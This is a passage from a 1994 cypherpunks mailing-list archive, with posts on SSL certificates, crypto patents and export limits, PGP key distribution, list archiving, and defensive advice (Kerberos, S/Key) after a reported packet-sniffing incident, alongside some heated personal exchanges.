iQBFAwUBLu4gTCoZzwIn1bdtAQHk1wF/XY0PbJjkuOia/lUi+11GsSFVODQLM6b1 lPEF38ufdFM157KPVWX4HI0ry7Wxr+Sm =W21x -----END PGP SIGNATURE----- From jamiel at sybase.com Tue Dec 13 14:35:49 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Tue, 13 Dec 94 14:35:49 PST Subject: IPSP and Netscape Message-ID: >One may be a reasonable inference, as I inferred >that Chomsky sought to justify mass murder and >brutal terror. The other is a lie. Somebody make him stop! Please! -j -- On the internet, no one knows you're a deity. ___________________________________________________________________ Jamie Lawrence After December 16th ---------> From lmccarth at bali.cs.umass.edu Tue Dec 13 14:44:37 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 14:44:37 PST Subject: CHOMSKY MADNESS!!! Message-ID: <199412132248.RAA08700@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- James Donald writes: > One may be a reasonable inference, as I inferred > that Chomsky sought to justify mass murder and > brutal terror. The other is a lie. Hey Eric, how about a filter that delays all messages to the list which mention Chomsky by a month or so ? - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4kpCoZzwIn1bdtAQHgDgGApDSD7Z+FZW+ykNEO8WujOFnDUhbyxSnv tyb0ZVY8mnVjmookxn19UVE8iRbLZQKU =Rwt7 -----END PGP SIGNATURE----- From db at Tadpole.COM Tue Dec 13 15:06:02 1994 From: db at Tadpole.COM (Doug Barnes) Date: Tue, 13 Dec 94 15:06:02 PST Subject: Elliptic crypto is patented In-Reply-To: Message-ID: <9412132304.AA26604@tadpole.tadpole.com> > Incidentally Next Computer's Fast Elliptic Encryption, FEE, used > elliptic curves, and is patented (by R E Crandell, USP# 5,159,632,27 October > 1992); also, elliptic crypto is probably covered by the DH/PKP patents. > Is the FEE patent on some tweaking of it, or are they claiming anything using ECs for crypto? (Esp. DH and ElGamal analogue)? PKP claims all public key, but: a) Vanilla El Gamal crypto is covered, tenuously at best, by their Diffie-Hellman patent, which some consider to be contestable based on publication more than a year before filing. The DH patent expires in a few years as well. b) EC-based El Gamal is ever farther from DH and vanilla El Gamal (since it uses different math). It is even less likely to be held to infringe. PKP's overall claim to public key cryptography may also be weakened by several different outcomes to the current round of lawsuits. One thing that is _not_ likely to be weakened is their claim on RSA. Therefore, if you're not interested in supporting PKP's attempt to make their strongest patent the centerpiece of various Internet standards, working towards EC encryption is a Good Thing. From cactus at seabsd.hks.net Tue Dec 13 15:08:26 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:08:26 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412132312.SAA09000@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412131937.LAA00857 at netcom10.netcom.com>, James A. Donald wrote: >I am sick of you misrepresenting what I say, and I am sick of Eric >misrepresenting what I say. > >Cut it out. Excuse me, but my Ironometer just pinged itself off my desk. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4qYSoZzwIn1bdtAQHSfgGAqS3pIouxLUp0+da7igUyDpJUTuJ0Ouz9 aNIfa3Z59mJW9ZqIWnaOHuUq8s+lFMo3 =+g6l -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 15:16:08 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:16:08 PST Subject: calling all cpunks on netcom Message-ID: <199412132318.SAA09039@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412131946.LAA26053 at netcom20.netcom.com>, Shrieks wrote: >Just floating a trial balloon. Are you tired of the high traffic on >the cypherpunks list and having to wade through a ton of mail every >day? ... >Just a thought. Pheedback? % setenv NNTPSERVER nntp.hks.net % trn hks.lists.cypherpunks It's a bit slow because it has all the traffic since June. I'll implement "expire and archive" soon so it'll be faster. But its usable (I'm using it over a 19.2 SLIP connection to our local network). I understand that pine can do something much tidier, pulling newsgroups from multiple news servers. Read yer docs fer details. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4rnyoZzwIn1bdtAQEFsAGAtecr1Ddz6GU25uZcvVPw8ohJbzxyYEnh sxqS8QBx6GU6MzcMNWydiPE3aZhoLcyk =Fsjn -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 15:22:22 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:22:22 PST Subject: calling all cpunks on netcom Message-ID: <199412132326.SAA09154@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412132147.NAA13766 at netcom12.netcom.com>, Timothy C. May wrote: >Netcom expires _all_ newsgroups, even its own ("netcom.*" local >discussion groups), in the "normal" period of 2-3 weeks. There is no >reason to expect them to make an exception for our group. If this is >not made an exception, then a 3-week hang around period will hardly >constitute an "archive." (Yes, it will reduce _some_ storage, by a >shared pool, but only temporarily.) nntp.hks.net's hks.lists.cypherpunks has back to June. We'll continue to keep at the very least one month back, even once we start archiving and expiring -- and the archives will be available by ftp. So people need only keep pointers to Message-IDs within the archives. I'll almost certainly hack something together that will retrieve articles on the Web in my copious spare time. For now all the articles are available both via nntp for newsreaders and ftp via ftp://ftp.hks.net/cypherpunks/nntp/cypherpunks/ (it's big). - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4tbyoZzwIn1bdtAQHLIAGAiAT5Vh2YJnduSJ0aJvSGDSbcBEhoIVz2 Fcjw0PfU1wlGLZsiDIiky6fEsms0EdnY =JKuL -----END PGP SIGNATURE----- From jamesd at netcom.com Tue Dec 13 15:25:53 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 13 Dec 94 15:25:53 PST Subject: IPSP and Netscape Message-ID: <199412132323.PAA06915@netcom10.netcom.com> I wrote: > > Eric and Perry have repeatedly used this method - > > not only attacking a straw man, but lying outright > > that their opponent has *explicitly* proclaimed > > the straw man. > > > > I am thoroughly sick of this dishonest debating > > tactic. > > > > If someone genuinely believe his opponent assumes > > or implies something that is obviously false he > > should say "implies" or "assumes" > > > > To say "claims" or "states" is to say something completely > > different. Perry E. Metzger writes > We're sick of you inventing facts, but of course, you'll just claim > we've been doing that. I will provide an example: Will you? You wrote: > You claim we haven't done anything and Netscape has. Where did I claim that? That is an example of a fact that you invented. Now provide an example of a fact that I invented. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From sameer at c2.org Tue Dec 13 15:26:55 1994 From: sameer at c2.org (sameer) Date: Tue, 13 Dec 94 15:26:55 PST Subject: calling all cpunks on netcom In-Reply-To: <199412132147.NAA13766@netcom12.netcom.com> Message-ID: <199412132322.PAA26201@infinity.c2.org> ObPlug: c2.org has a mail->news gateway for cypherpunks. (mail.cypher) -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From cactus at seabsd.hks.net Tue Dec 13 15:33:59 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 15:33:59 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <199412132338.SAA09286@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9412131824.AA13662 at sulphur.osf.org>, Rich Salz wrote: >> AMS is pretty strongly tied to AFS (now known as part of DCE) > >At some levels DCE's distributed file system (DFS) is "AFS version 5" (sic), >but not really. The original intent was that DFS was AFS with the IPC replaed >with secure DCE RPC, but there's a whole mess of protocol changes since then. > >They're different beasts. I stand corrected. FWIW, I was mentioning DCE mostly for context rather than any claim of interoperability. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu4waCoZzwIn1bdtAQHU5wF8Cn2+2I3AmqnVPcmNTBke6jqaCNmZ0ljU FfYJlbG37TSZcKomZ2a12MG8VjuHKXgO =wkvs -----END PGP SIGNATURE----- From M.Gream at uts.EDU.AU Tue Dec 13 15:41:11 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Tue, 13 Dec 94 15:41:11 PST Subject: ohh, sheesh! forget that last message. In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com> Message-ID: <199412132340.AA21926@sequoia.itd.uts.EDU.AU> d'oh. slip of the fingers, my apologies for the last message. mg. -- Matthew Gream (sw/hw engineer) (02) 821-2043 From ianf at sydney.sgi.com Tue Dec 13 15:50:06 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 13 Dec 94 15:50:06 PST Subject: More 40-bit RC4 nonsense In-Reply-To: <199412131742.JAA27330@netcom5.netcom.com> Message-ID: <9412141041.ZM15859@wiley.sydney.sgi.com> On Dec 13, 2:59pm, Michael Johnson wrote: > Why did the NSA require that an application using the Sapphire Stream Cipher > be limited to a _32-bit_ session key instead of the well-known _40-bit_ > limit for RC4? I wonder if there are other key bit leaks that cover the other > 60%? It could also be because they've made an investment in custom hardware to "crack" RC4 by justifying it in terms of the volume which will result from the special export status, whereas the volume of sapphire use they are expecting is lower and so they'll be using off-the-shelf systems to decrypt any streams seen from it. Ian. From ianf at sydney.sgi.com Tue Dec 13 16:04:08 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 13 Dec 94 16:04:08 PST Subject: IDEA freeware In-Reply-To: <9412132014.AA12191@mycroft.rand.org> Message-ID: <9412141047.ZM15874@wiley.sydney.sgi.com> On Dec 13, 12:14pm, Jim Gillogly wrote: > If you're using PGP for non-commercial use, IDEA is free because it's > licensed for non-commercial PGP use. I'm pretty confident that you need > to get a separate IDEA license with any new product you use it in, > commercial or not. > > I have the e-mail contact address somewhere, and can post it if need be. I contacted Ascom-Tech regarding the purchase of a single-user personal licence to use IDEA. The provisions were fairly standard (ie. no guaantees of any kind), and the price was 90 sFr. Ian. From bshantz at spry.com Tue Dec 13 16:36:32 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Tue, 13 Dec 94 16:36:32 PST Subject: Legal implications of a PGP DLL Message-ID: <9412140032.AA25902@homer.spry.com> I know this has been hashed over recently, but I never found out (or don't remember) what was decided in regards to the legal implications of a PGP functional DLL for Windows. If a company (i.e. SPRY, wink, wink, nudge, nudge.) were to write a PGP DLL and make it publicly available, would that be legal? Viacrypt just straight out charges too damn much to make it worth licensing. So, if a company wants to make it's mail client PGP friendly, but not actually supply the encryption algoritm, etc. Would a DLL be legal if it were in the public domain? >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From jya at pipeline.com Tue Dec 13 16:45:12 1994 From: jya at pipeline.com (John Young) Date: Tue, 13 Dec 94 16:45:12 PST Subject: Coda for E=mc(2) Message-ID: <199412140044.TAA00854@pipe2.pipeline.com> The technical manuscript on which part of "Beyond E=mc(2)" is based was published in Physical Review A [no date given] only after five peer reviews, says the editor of The Sciences. From hfinney at shell.portal.com Tue Dec 13 16:48:21 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 13 Dec 94 16:48:21 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412131653.AA45063@amanda.dial.intercon.com> Message-ID: <199412140047.QAA17489@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Amanda Walker" writes, quoting someone from Netscape: >> I didn't bother imbedding the RSA Unaffiliated User CA because I >> didn't think server operators would use it to get certificates. >Well, it's what Apple is using for PowerTalk signers (which are a key pair and >X.509 certificates, by default from the Unaffiliated User PCA). It makes >sense for personal (as opposed to organizational) servers, such as someone >running MacHTTP for their home page... >On the other hand, if RSA has set up a server PCA, that should be suffcient >for now. I wonder what the certification policy is, though--how do you prove >that you control a given server? For an Unaffiliated User CA certificate, you >just have to show a notarized application and two forms of ID, one with a >photo (driver's license, passport, etc.). I can't off hand think of an >equivalently strong way to ID control of a server... This relates to the other part of my question, which didn't get answered: what is the relationship between the name found in the X.509 certificate and the server? Does X.509 include an internet address like mcom.com, and the Netscape client checks that this matches the address of the server it is connecting to? I am not very familiar with the certificate format but I had the impression that it used a very different naming scheme. Or does the client accept any valid certificate without regard to the connection if any between the name in the certificate and the server to which it is connected? This whole area was left undefined in the SSL spec but will be important for interoperability. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu5AkhnMLJtOy9MBAQEFQgH/dmiiEjycULNdDCNiU8SkoB57bHv9W5Lc d+K7cBqq0ZknCwXtqZtbPTR7d8F1z0WFbMlP6QF3zywVz2GrDIg5kg== =qQ9u -----END PGP SIGNATURE----- From skaplin at skypoint.com Tue Dec 13 18:20:13 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 13 Dec 94 18:20:13 PST Subject: NEW key distribution venue up and running! Message-ID: <199412140225.VAA11077@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- After much angst the following is up and running. Special thanks to L. McCarthy and Sameer for the help. BTW-I've been having mail problems so this may show up a few times...apologies in advance. Sam Welcome!! This is the PGP public key distribution mailing list. The purpose of this list is to provide an easy and free method to distribute PGP public keys. The sole purpose of this list is to distribute PGP public keys. Any questions or problems with PGP should be posted in alt.security.pgp. All keys posted to this list are channeled to three different sources: 1) The subscribers of this list. 2) The keyservers 3) alt.security.keydist Please note that you do not have to be a subscriber to the list to post to the list. All messages addressed to pgp-public-keys at c2.org will be posted to the list. Because of this please post only PGP PUBLIC KEYS. The keyserver that this list posts to is a non-U.S.A. location. This is to provide support for all versions of PGP. A special note for users of AUTOPGP or similar utilities: AUTOPGP has the ability to directly take keys out of a mail packet. This feature coupled with this list can seamlesly update your key ring. To do this. 1) Subscribe to the list. 2) Configure AUTOPGP to automatically update your key ring. 3) Configure your offline mail reader to discard all message coming from the list. Offline AutoPGP is Copyright (c) 1993, 1994 by Felix Shareware and the author St�le Schumacher. All Rights Reserved. Please direct any questions or problems to: skaplin at skypoint.com PGP encrypted mail is accepted and encouraged. - - - ----------------------------------------------------------------------------- To subscribe to the list, send a message to: majordomo at c2.org In the body of the message include: subscribe pgp-public-keys - - - ----------------------------------------------------------------------------- To unsubscribe from the list, send a message to: majordomo at c2.org In the body of the message include: unsubscribe pgp-public-keys - - - ----------------------------------------------------------------------------- ============================================================================== Life can only be understood backwards; but it must be lived forwards. - S�ren Kierkegaard, "Life" ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLu5UdclnXxBRSgfNAQEWcQf9HC5s+rHX+14+ao0IhfIhdqvugDdf5YH8 VAx5oDVIyCm5HqmEp/wYRaYOnoFtIv4j7fa7jYfzvTL9tQGBfJ1ygh5KUo3r9Oqw hGn3iIkcylGquz/cvh2JUBFTowdueSII4180Bbj1xIElQJG2nPSh1KeALIjWqHJS Ch4nSnzwZaVCaY+tITTVTsWezX14UXjmITXU0TG2OpQaMC+Unzlj7EiWWQyqQ/k5 4UIGGLajPaif1AKyZBcv0anxrW88Wcfx16c2giV9sS7+3v6OWI2ItQMo94LfnWnl j78gmXW0dQ3+IIPs+0WmQsghFpPHXwMbtqnLa8O4IRcWMPGmJIxo4A== =bw2k - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu5XWyoZzwIn1bdtAQG7VgF/a7W7C0N3rwSf+RxurCmreBjsjQmP4DEj Kq+TpEQDjhwOvDgh+OLunv93rNr3IKI2 =+3lV -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Tue Dec 13 18:38:35 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 13 Dec 94 18:38:35 PST Subject: Brands excluded from digicash beta In-Reply-To: Message-ID: <199412140243.VAA11280@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Nathaniel Borenstein wrote in the middle of his novel: >It is not a coincidence that we are the first (and so > far, still the only) system that is operational with real money. Why do you keep claiming this? It wins you no points in this forum: people know better. Bibliobytes/HKS' system has been in operation since June, processesing orders for soft matter. NetMarket's system has been on-line and working since August, taking orders for CDs and flowers. Etc, etc... - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu5bvSoZzwIn1bdtAQFpsQGAy+fPx09OYW7TGKpqYrX+KtmjakvDnPie SZhiKZLvV/oPV/FITSaDWlb9qb/H5IX+ =vakz -----END PGP SIGNATURE----- From anonymous-remailer at replay.com Tue Dec 13 19:01:26 1994 From: anonymous-remailer at replay.com (Name withheld on request) Date: Tue, 13 Dec 94 19:01:26 PST Subject: No Subject Message-ID: <199412140302.AA05947@xs1.xs4all.nl> perry shut the fuck up you arrogant dweeb From loki at nately.UCSD.EDU Tue Dec 13 19:26:29 1994 From: loki at nately.UCSD.EDU (Lance Cottrell) Date: Tue, 13 Dec 94 19:26:29 PST Subject: Emergency! Need single use passwords! Message-ID: <9412140329.AA27612@nately.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- Hi all. We discovered that someone has been running a packet sniffer on our subnet of several dozen computers. He has all the passwords. This is my chance to try to get single use password login programs installed here. Please give me recomendations and ftp locations. Thanks. - ---------------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche - ---------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu5mUFVkk3dax7hlAQGP9gP8DB5WGmLQsSR6AGPTKkPMOqyAew+NDsiE ftwsDXJV2ijZfabkY+2V84ea4lDLku7BPmz+5p4gI7E2ezDFHgJ/bQ/cDspsjZoO EzmqiJqJGkCNggFdKzD29jsU1v+icZEdMOuwGZ7rMKEAfCtBCmT9X8Uvk4q7S+YO udLS1eGddAY= =7gbf -----END PGP SIGNATURE----- From warlord at MIT.EDU Tue Dec 13 19:41:17 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Tue, 13 Dec 94 19:41:17 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: <9412140341.AA01961@toxicwaste.media.mit.edu> I highly recommend Kerberos. It is available via anonymous ftp from athena-dist.mit.edu:/pub/ATHENA/kerberos (I believe -- they've changed the site around recently). Alternatively you can get CNS from Cygnus Support, which is a more up-to-date Kerberos release. NOTE: Kerberos is a network authentication system based upon DES and a secure server. It requires that the Kerberos server remain secure, but that tends not to be too much of a problem if you have some machine that you can lock away in a machine room somewhere. No useful information is sent over the net in clear-text, so it solves your sniffer problem as well. Hope this helps. -derek From lmccarth at ducie.cs.umass.edu Tue Dec 13 20:51:19 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 20:51:19 PST Subject: Using HotWIRED without provoking junk mail Message-ID: <199412140456.XAA12500@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > I get enough junk mail already, and I don't want vendors to be able to > capture market research at the browsing level (I haven't > looked at WIRED's server for precisely this reason). A while back someone established a HotWIRED account in the name "cypherpunks" with password "cypherpunks" to get around this. I make a point of mentioning that whenever I point someone to HotWIRED. I'm assuming here that they're not collecting identification data in some other way (if you're not using Netscape ;). - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu55rGf7YYibNzjpAQExGwP/S0ahTCimJlYKQCK1DGjHbdSxcaovbHHI Ybtcw8iaGwYZxmEWcK5fM8tRqORV99oGUISdynMrFCw0VV+cvozot4q+GSMCpcND uIsSgkw/D3F3XWfWLtJDocme3Joot1cARfmo6lj7YmqBjHS2e27OOke8BQ2JeOBh 3wceidNaEKk= =fWzB - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu564ioZzwIn1bdtAQExZwF9EEHP+++Y3ODxhxSZPY3IeVSC0JtOc7vc xu2avrEaeNetk0yPogy1+tmjwb6JC2e8 =qVmS -----END PGP SIGNATURE----- From ddt at lsd.com Tue Dec 13 21:08:11 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Tue, 13 Dec 94 21:08:11 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Tue, 13 Dec 1994 21:08:38 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: KEYSRVR: remove w/o revoke? -----BEGIN PGP SIGNED MESSAGE----- A Keyserver Dilemma: Through the good graces of one Craig Steinberger, I discovered that the keyserver Michael Graff runs at Iowa State has an old, defunct key for me. Naturally, I've tried to update it, but am not sure if I was successful yet, but here's my question: Is there a mechanism for deleting your own key from a keyserver's ring without revoking it? I think not, on the surface of it, it goes against general key hygiene procedures. History: I sent that 512 key to two people almost two years ago as a test and never used it since. Apparently it got put on someone's keyring and transferred to Iowa at some point. (Note: _I_ never added it to any keyserver, so there's a problem with posting other people's keys and not telling them that also needs addressing here.) Now, since I never expected to use that key again, I deleted the secret half of the pair, and hence am unable to revoke it. Asking Michael nicely to remove it from Iowa (which requires a certain measure of trust most keyserver-owners might not extend under normal conditions) is fine. But what about all the other keyservers that propagate the bogus key all over (and back to Iowa)? How can one deal with that problem? Key management is one of my _least_ favorite aspects of PGP. grrrrr... BTW, my (good) key is available at: ftp.netcom.com:/pub/dd/ddt/crypto/ddt-PGP-key.txt My apologies to anyone who hasn't been able to verify my signatures because of the bogus key. dave _____________________________________________________________ "To solve a maze, start at the cheese and mouse backwards." -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLu5noaHBOF9KrwDlAQHHogP/ds8Nr2nlnR6mRZbul24Kk07FvBrNCqrb TY70MN9aEsKLoALXpdvC4ZIc2npwk3HWK/UN7mayqZsVWwOpJf/NZwATcYHrlGxT 5sHsAhGAzb7TlpByEUJ+He65e7a8doyqffHuUeNdokM5YFkxQi/LRfPVkIDi3cGG jq6NJR20SKs= =+Zfi -----END PGP SIGNATURE----- From ddt at lsd.com Tue Dec 13 21:08:28 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Tue, 13 Dec 94 21:08:28 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Tue, 13 Dec 1994 21:08:19 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: Re: calling all cpunks on netcom At 11:46 am 12/13/94, Shrieks wrote: >Just floating a trial balloon. Are you tired of the high traffic on >the cypherpunks list Well, yes, it does get a BIT junked-up at times (mea culpa). >and having to wade through a ton of mail every >day? Any of you folks approaching your 5M limit from archiving too >many messages? No, I don't rely on Netcom to store it for me, I POP back it to my home machine and fill the nooks and crannies on my HD before I archive it all to big, monthly searchable text files (which lay compressed at the botton of another drive hanging off my home ether). But that's just me: when I first subscribed in 92 from Budapest (gaak! telecom hell!), I had a very funky and expensive connection and it was a "nagy" pain in the ass. Of course, the volume back then wasn't quite as... "intense." >Well, I am and I don't really want to start paying for the extra memory. I'm sympathetic to that: if there's a better way to do it, I'm all eyes. >I was wondering if it might be worth petitioning the netcom sysadmins >to start up a local newsgroup (eg. netcom.cpunks) [elided] As far as trial balloons float, it's not a horrible one, BUT: while I applaud the intent, the method sorta suc-er-(let's see... #10 on Engineer's New Terminology list...from October's FUN10 list ... ah here we go: "WE WILL LOOK INTO IT"(1). Besides the feasibility problems that Timothy mentioned (Netcom bonking files after a while), I'm just convinced that getting Netcom to do somthing this _complex_ would be *UTTERLY IMPOSSIBLE*. I mean, they don't return phone calls, they don't answer support mail (well, almost never), and it took them three-and-a-half-months (yes, you read that correctly) to find the 2 minutes to set up an anon ftp directory for one of my clients (still no explanation for that, btw). Not to mention that certain dept managers there have a tendency to "work around the truth." Now, you tell ME that they can handle something like a local ng (no smirking, now!). Hell, they can't handle the quotidian business they HAVE much less something "technical." Uh, flame off. Yikes. Sorry 'bout that, lads. It's just that I can think of other things I'd prefer to RAM up my butt than more Netcom hassles. Wait a minnit: isn't this alt.netcom.sucks? Oh dear, I wanted the room down the hall. Excuse me. Also, did someone (Tim?) mention that Netcom filters all our packets to the NSA? I'd like to know how anyone could ping that out, but maybe it might be a good idea all the same if we just try to set up our own box overseas. If it could give us a bit more security/fewer intrusions, I'd send the Hack-Tik boys (fer example) in A'dam some fraction of my pathetic bank account to get it up (in the red light district, perhaps, wouldn't _that_ be appropriate?), and/or maybe someone who shall remain nameless with the initials JG might be overcome by philanthropism (yet again) and help us put an old unused box online "somewhere". I'm just thrashing here, but maybe there's kernel of a worthwhile idea here (all puns intended, always). What about Arthur Abraham? Arthur? >Another alternative might be to set up something along the lines of >discuss at mit [elided] This might be viable, but sick puppy that I am, I LIKE getting all this mail dumped on my machine from Eric's remailer. I kind of understand Tim's point: with the files local, I can browse/search at will at greater speeds, etc. And ruthless deletion is the only way to survive the onslaught. Of course, this all means I can never go on vacation unless I unsub for the duration, or else I DO get those dorky "your mailbox is full" msgs from you-know-who. s i g h >Just a thought. Pheedback? Screeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-oops, sorry, forgot to turn my radio down. dave [1] Which means: "Forget it! We have enough problems right now." ____________________________________________________________________ "I'm quite confident about the Republicans salvaging the Economy: heck, look what a swell job they're doing down in Orange County!" From adam at bwh.harvard.edu Tue Dec 13 21:12:55 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 21:12:55 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: <199412140410.XAA16407@bwh.harvard.edu> | Hi all. We discovered that someone has been | running a packet sniffer on our subnet of several | dozen computers. He has all the passwords. | This is my chance to try to get single use password | login programs installed here. Please give me recomendations | and ftp locations. S/Key is a very nice software only solution (no smart cards). It has clients for Mac, PC, Unix, and supports paper lists as well. Can be configured to only be invoked if the connection is from outside your net. ftp.win.tue.nl:/pub/security/logdaemon.tar.Z In quick reply to Derek's suggestion of Kerberos, I will point out that Kerberos does not deal well with remote users. As far as I know, you need a special connection mechanisim or your password will travel in the clear to the boundary of your keberized network. (There is Kerberos support for S/key, there may be telnet programs. There is no paper list or palmtop support.) Adam If you're interested, I can mail you the intro to S/Key sent to our user community. It covers S/key and PGP, since we have users all over the globe. -- "It is seldom that liberty of any kind is lost all at once." -Hume From werewolf at io.org Tue Dec 13 21:34:32 1994 From: werewolf at io.org (Mark Terka) Date: Tue, 13 Dec 94 21:34:32 PST Subject: Encrypted Credit Card Numbers For Transmission.... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought about this recently when I bought a subscription to Wired for X-Mas for a friend. Why don't organizations like Wired (who are ostensibly closely connected to the 'net) not have public keys (ie through Viacrypt, as they are a commercial enterprise) that subscription purchasers could encrypt a credit card number to 